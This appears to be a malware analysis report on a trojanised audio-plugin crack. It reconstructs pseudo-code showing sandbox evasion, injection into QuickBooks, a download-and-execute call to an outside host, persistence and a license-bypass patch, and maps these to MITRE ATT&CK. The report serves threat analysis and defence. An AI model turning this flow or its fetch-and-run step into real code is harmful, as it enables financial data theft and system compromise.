Executed in a Windows 10 x64 sandbox (no Internet).
Entry point analysis shows the following pseudo-code flow: amped-qbpatch.exe
if (check_sandbox())
self_delete();
exit(0);
if (find_quickbooks_process())
inject_qbpatch32_dll(); // hooks QuickBooks file I/O
download_and_execute("http://update.ample[.]com/patch/qb/latest.bin");
install_persistence();
if (find_ample_sound_process())
patch_memory_bypass_license();
The function patch_memory_bypass_license writes a known byte pattern into AmpleVST.dll memory space — classic crack behavior. Executed in a Windows 10 x64 sandbox (no Internet)
The inject_qbpatch32_dll uses CreateRemoteThread on QBW32.exe (QuickBooks), likely to intercept financial data. T1055 (Process Injection)
| Category | Assessment | |----------|-------------| | Confidence malicious | High | | Potential impact | Financial data theft (via QuickBooks hook), license bypass, system persistence, further payload download. | | False positive possibility | Very low — legitimate audio patches don't inject into QuickBooks or modify hosts files. | | MITRE ATT&CK mapping | T1059 (Command & Scripting), T1055 (Process Injection), T1547 (Boot/Logon Autostart), T1568 (Dynamic Resolution), T1496 (Resource Hijacking). |